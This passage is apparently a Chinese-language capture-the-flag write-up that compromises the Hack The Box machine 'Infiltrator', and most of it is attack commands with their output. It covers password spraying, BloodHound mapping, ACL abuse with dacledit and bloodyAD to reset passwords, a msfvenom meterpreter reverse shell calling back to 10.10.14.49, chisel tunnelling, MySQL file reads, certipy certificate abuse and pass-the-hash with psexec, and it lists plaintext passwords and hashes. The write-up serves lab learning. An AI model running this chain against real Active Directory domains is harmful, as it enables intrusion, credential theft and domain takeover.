S-1-5-21-3435041394-657642867-1777010750-500 DC01\Administrator (Local User)
S-1-5-21-3435041394-657642867-1777010750-501 DC01\Guest (Local User)
S-1-5-21-3435041394-657642867-1777010750-503 DC01\DefaultAccount (Local User)
S-1-5-21-3435041394-657642867-1777010750-504 DC01\WDAGUtilityAccount (Local User)
S-1-5-21-3435041394-657642867-1777010750-513 DC01\None (Domain Group)

[+] Enumerating users using SID S-1-5-21-2606098828-3734741516-3625406802 and logon username 'l.clark', password 'WAT?watismypass!'           
                                                                       
S-1-5-21-2606098828-3734741516-3625406802-500 INFILTRATOR\Administrator (Local User)
S-1-5-21-2606098828-3734741516-3625406802-501 INFILTRATOR\Guest (Local User)
S-1-5-21-2606098828-3734741516-3625406802-502 INFILTRATOR\krbtgt (Local User)
S-1-5-21-2606098828-3734741516-3625406802-512 INFILTRATOR\Domain Admins (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-513 INFILTRATOR\Domain Users (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-514 INFILTRATOR\Domain Guests (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-515 INFILTRATOR\Domain Computers (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-516 INFILTRATOR\Domain Controllers (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-517 INFILTRATOR\Cert Publishers (Local Group)
S-1-5-21-2606098828-3734741516-3625406802-518 INFILTRATOR\Schema Admins (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-519 INFILTRATOR\Enterprise Admins (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-520 INFILTRATOR\Group Policy Creator Owners (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-521 INFILTRATOR\Read-only Domain Controllers (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-522 INFILTRATOR\Cloneable Domain Controllers (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-525 INFILTRATOR\Protected Users (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-526 INFILTRATOR\Key Admins (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-527 INFILTRATOR\Enterprise Key Admins (Domain Group)
S-1-5-21-2606098828-3734741516-3625406802-1000 INFILTRATOR\DC01$ (Local User)

 ==============================( Getting printer info for infiltrator.htb )==============================                                     
                                                                       
do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND


enum4linux complete on Thu Sep  5 16:43:49 2024

似乎没啥有用的。

密码喷洒

将用户名提取出来：

d.anderson
o.martinez
k.turner
a.walker
m.harris
l.clark
e.rodriguez

crackmapexec smb 10.10.11.31 -u employee.txt -p 'WAT?watismypass!'

d.anderson 也是这个密码。

BloodHound 信息搜集

bloodhound-python -c ALL -u l.clark -p 'WAT?watismypass!' -d infiltrator.htb -ns 10.10.11.31
INFO: Found AD domain: infiltrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 14 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.infiltrator.htb
WARNING: Failed to get service ticket for dc01.infiltrator.htb, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 27S

然后使用 Bloodhound，没有就先安装

安装 bloodhound

sudo apt install -y bloodhound
neo4j console

然后打开localhost:7474，账号密码neo4j:neo4j

然后改个密码。

然后就可以通过命令行执行bloodhound运行连接了。账号是neo4j密码是你修改的密码。

但是我这里还是会出现问题。

解决 Clock skew too great 问题

Fixing the “Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)” Issue While Kerberoasting

如果这里你遇到了：

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

这个问题，也就是时钟相差太多，即使是你用 ntp 及时更新可能也修复不了。

这时候可能你需要按照以下操作来操作。

su # 切换到root权限
timedatectl set-ntp off # 禁用网络时间协议自动更新
rdate -n 10.10.11.31 # 和目标ip同步网络

而且要关闭 vmware-tools 的时间同步：

重新执行一下。

bloodhound-python -c ALL -u l.clark -p 'WAT?watismypass!' -d infiltrator.htb -ns 10.10.11.31
bloodhound-python -c ALL -u d.anderson -p 'WAT?watismypass!' -d infiltrator.htb -ns 10.10.11.31

将输出的两堆 json 文件都导入到 bloodhound 中。在显示模式中选择无约束委派系统最短攻击路径。

能注意到有路线：

D.ANDERSON->MARKETING DIGITAL->E.RODRIGUEZ->CHIEFS MARKETING->M.HARRIS->DC01

D.ANDERSON->MARKETING DIGITAL

D.ANDERSON 对 MARKETING DIGITAL 有 Generial All 权限。前面 enum 的时候尝试过登录这个账户。 D.ANDERSON 这个用户不能直接登录，账户收到限制，所以现在提升这个用户的权限。先获取该用户的 TGT，再使用该 TGT 以及 GenericAll 权限。得到 MARKETING DIGITAL 的完全控制权。

# 获取 d.anderson TGT
getTGT.py infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb
# 通过使用 dacledit 修改 ACL 使 d.anderson 具有完全控制权
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip 10.10.11.31

MARKETING DIGITAL->E.RODRIGUEZ

GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation Framework

E.RODRIGUEZ 包含在 MARKETING DIGITAL 组中 D.ANDERSON 对 MARKETING DIGITAL 有完全控制权。可以直接修改 E.RODRIGUEZ 密码。

使用 D.ANDERSON 的权限和 bloodAD 修改 E.RODRIGUEZ 的密码。

注意由于密码策略，这里需要执行完上一步之后立即执行，否则会报错。（如果显示因为时间错误就重新执行一次上一步即可）

bloodyAD --host 'dc01.infiltrator.htb' -d 'infiltrator.htb' --kerberos --dc-ip 10.10.11.31 -u 'd.anderson' -p 'WAT?watismypass!' set password 'e.rodriguez' 'WAT?watismypass!'

这里把对应密码也改成了 WAT?watismypass!

E.RODRIGUEZ->CHIEFS MARKETING

按照 Bloodhound 的图示，我们需要将 E.RODRIGUEZ 加入到 CHIEFS MARKETING 组中。还是之前的流程，先获取 TGT，在利用 addself 权限添加。

getTGT.py infiltrator.htb/"e.rodriguez":'WAT?watismypass!' -dc-ip dc01.infiltrator.htb
KRB5CCNAME=e.rodriguez.ccache
bloodyAD --host 'dc01.infiltrator.htb' -d 'infiltrator.htb' --dc-ip 10.10.11.31 -u 'e.rodriguez' -k add groupMember 'CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB' e.rodriguez

CHIEFS MARKETING->M.HARRIS

添加到 CHIEFS MARKETING 后，CHIEFS MARKETING 组可以修改 M.HARRIS 的密码，我们使用 E.RODRIGUEZ 身份修改 M.HARRIS 的密码。

KRB5CCNAME=e.rodriguez.ccache
bloodyAD --host 'dc01.infiltrator.htb' -d 'infiltrator.htb' --kerberos --dc-ip 10.10.11.31 -u 'e.rodriguez' -p 'WAT?watismypass!' set password 'm.harris' 'WAT?watismypass!'

这里报错提示凭证过期，那么就得把前面的一起加速重新打一下，顺便整理下：

# 获得TGT
getTGT.py infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb
# 通过使用 dacledit 修改 ACL 使 d.anderson 具有完全控制权
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip 10.10.11.31
# 修改 e.rodriguez 密码
bloodyAD --host 'dc01.infiltrator.htb' -d 'infiltrator.htb' --kerberos --dc-ip 10.10.11.31 -u 'd.anderson' -p 'WAT?watismypass!' set password 'e.rodriguez' 'WAT?watismypass!'
# 获得 e.rodriguez TGT
getTGT.py infiltrator.htb/"e.rodriguez":'WAT?watismypass!' -dc-ip dc01.infiltrator.htb
KRB5CCNAME=e.rodriguez.ccache
bloodyAD --host 'dc01.infiltrator.htb' -d 'infiltrator.htb' --kerberos --dc-ip 10.10.11.31 -u 'e.rodriguez' -p 'WAT?watismypass!' set password 'm.harris' 'WAT?watismypass!'

USER

getTGT.py infiltrator.htb/"m.harris":'WAT?watismypass!' -dc-ip dc01.infiltrator.htb

然后登录 M.HARRIS 账户。使用 evil-winrm 登录。但是无法登录，提示无法定位INFILTRATOR.HTB的KDC，按照下面文件修改 /etc/krb5.conf 文件。

[libdefaults]
    default_realm = INFILTRATOR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    forwardable = true
[realms]
    INFILTRATOR.HTB = {
        kdc = dc01.infiltrator.htb
        admin_server = dc01.infiltrator.htb
    }
[domain_realm]
    .infiltrator.htb = INFILTRATOR.HTB
    infiltrator.htb = INFILTRATOR.HTB

KRB5CCNAME=m.harris.ccache evil-winrm -i dc01.infiltrator.htb -u 'm.harris' -r INFILTRATOR.HTB

登上之后就能读取 user.txt 了。

PE

GitHub - peass-ng/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

登录之后用 msf 上传一个 shell。

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.10.14.49 lport=9293 -f exe > shell.exe
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.49
LHOST => 10.10.14.49
msf6 exploit(multi/handler) > set LPORT 9293
LPORT => 9293
msf6 exploit(multi/handler) > exploit

使用 msf 自带命令上传 winpeas 查看漏洞。

upload '/hxxx/winPEASx64.exe' 'C:\Temp\winpeas.exe'
.\winpeas.exe > 1.txt

然后把这个 1MB 左右的文件下载下来看。

到对应的位置找到有一个 my.ini 文件，但是没有足够权限阅读。

SQL 文件泄露

发现 ProgramData 目录下存在 Output Messenger 和 Output Messenger Server 文件夹，Output Messenger Server文件夹下有一个 OutputMessengerMysql.zip 。里面有 sql 的账号和密码。

用 msf 自带的命令下载文件：

download 'C:\ProgramData\Output Messenger Server\Temp\OutputMessengerMysql.zip' '/xxx/OutputMessengerMysql.zip'

解压后OutputMysql.ini文件里面有账号密码。

root:ibWijteig5

chisel 将数据库端口代理到本地：

# kali
chisel server -p 6150 --reverse
# target
.\chisel.exe client 10.10.16.5:6150 R:9292:127.0.0.1:9292

或者直接使用 msf 自带的隧道：

portfwd add -l 9292 -p 14406 -r 10.10.11.31

登录 mysql，直接读取文件：

mysql -h 127.0.0.1 -P 9292 --skip-ssl -u root -pibWijteig5
SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');

这个应该是非预期，预期可能我预期不出来了，等后面 wp 多的再看吧。

ROOT （Not Yet）

这 PE 不会了，找的的部分 exp 都前言不搭后语。疯魔了要。这里放几个我找到的 exp：

certipy find -u 'infiltrator_svc$@Infiltrator.htb' -hashes '52dfec373c144cb8d50334cb73934612' -dc-ip 10.10.11.31
certipy template -u 'infiltrator_svc$@Infiltrator.htb' -hashes '52dfec373c144cb8d50334cb73934612' -target-ip infiltrator.htb -template 'Infiltrator_Template'
certipy req -u 'infiltrator_svc$@Infiltrator.htb' -hashes '52dfec373c144cb8d50334cb73934612' -target dc01.infiltrator.htb -ca 'infiltrator-DC01-CA' -template 'Infiltrator_Template' -upn 'administrator@infiltrator.htb'
certipy auth -pfx administrator_dc01.pfx -domain 'infiltrator.htb' -dc-ip 10.10.11.31
# 导出 ticket
export KRB5CCNAME=administrator.ccache
# 登录
evil-winrm -r INFILTRATOR.HTB --ip DC01.INFILTRATOR.HTB

这个 id 哪来的？

盘外招

如果你在某个地方卡住了，可以看看这里。

evil-winrm -i infiltrator.htb -u winrm_svc -p 'WinRm@$svc^!^P'

psexec.py -hashes ':1356f502d2764368302ff0369b1121a1' administrator@10.10.11.31